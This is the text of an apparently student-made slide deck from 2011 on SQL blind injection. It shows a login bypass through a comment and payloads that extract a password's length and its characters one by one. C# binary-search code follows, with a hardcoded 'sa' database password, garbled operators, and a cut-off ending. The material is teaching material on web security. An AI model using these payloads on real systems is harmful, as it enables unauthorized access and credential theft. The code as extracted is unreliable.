web安全BlindSQLInj.ppt

1,SQL Blind Injection,小组成员：李昌华、肖箭、覃欢 2011-11-04,2,目录,3,目录,当一个攻击者通过在查询语句中插入一系列的SQL语句来将数据写入到应用程序中,从一个数据库获得未经授权的访问和直接检索.通过构造一些畸形的输入，攻击者能够操作这种请求语句去获取预先未知的结果。,一、SQL Blind Injection,基本的句法的过程即通过标准的SELECT WHERE语句，被注入的参数（即注入点）就是WHERE语句的一部分。为了确定正确的注入句法，攻击者必须能够在最初的WHERE语句后添加其他数据，使其能返回非预期的结果。对一些简单的应用程序，仅仅加上OR 1=1就可以完成，但在大多数情况下如果想构造出成功的利用代码，这样做当然是不够的。经常需要解决的问题是如何配对插入语符号（parenthesis，比如成对的括号），使之能与前面的已使用的符号，比如左括号匹配。 对于一些注入利用，仅仅改变WHERE语句就足够了，但对于其他情况，比如UNION SELECT注入或存储过程（stored procedures）注入，还需要能先顺利地结束整个SQL请求语句，然后才能添加其他攻击者所需要的SQL语句。在这种情况下，攻击者可以选择使用SQL注释符号来结束语句，该符号是两个连续的破折号（-），它要求SQL Server忽略其后同一行的所有输入。例如，一个登录页面需要访问者输入用户名和密码，并将其提交给SQL请求语句： SELECT Username, UserID, Password FROM Users WHERE Username = user AND Password = pass 通过输入john-作为用户名，将会构造出以下WHERE语句： WHERE Username = john -AND Password = pass 这时，该语句不但符合SQL语法，而且还使用户跳过了密码认证,二、常见的攻击方法,确定注入点,构造正确的 注入语句,获得预期结果,三、攻击步骤,定位漏洞,非授权访问,实施攻击,四、程序,原始查询语句（网页的源文件） string sqlSel = “select count(*) from tb_userInfo where userName=“ + txtUserName.Text + “ and userPass=“+pass+“; 1.猜测账户名： 输入任意账户测试 如200808 密码非空随便输 验证码,2.猜测到手的账户对应的密码长度： 200808 and exists(select userName from tb_userInfo where len(userPass)6 and userName=200808)- 密码非空随便输 验证码,3.猜测到手的账户对应的密码（逐位的判断） 200808 and (select ASCII(SUBSTRING(userPass,1,1) from tb_userInfo where userName=200808) 97 -,四、步骤和SQL语句,二分法可以使得测试长度的结果收敛的更快,二分查找的代码,快速猜测 程序,protect int getPasswordLen(int MaxPassLen,int MinPasstLen) /创建数据库连接 SqlConnection con = new SqlConnection(“server=.;database=WebSecurityHomeWork;uid=sa;pwd=123;“); /打开数据库连接 con.Open(); string basesql=“200808 and exists(select userName from tb_userInfo where len(userPass)“; string endsql=“ and userName=200808)-“; while() int currentLen=(MaxPassLen+MinPassLen)/2; string sqlSel=basesql+“=“+currentLen.toString()+endsql; /创建SqlCommand对象 SqlCommand com = new SqlCommand(sqlSel, con); if(Convert.ToInt32(com.ExecuteScalar() 0) return currentLen; /创建SqlCommand对象 SqlCommand com1 = new SqlCommand(sqlSel, con); sqlSel=basesql+“+currentLen.toString()+endsql; if(Convert.ToInt32(com.ExecuteScalar() 0) MinPasstLen=(currentLen+1+MaxPassLen)/2; getPasswordLen(int MaxPassLen,int MinPasstLen); el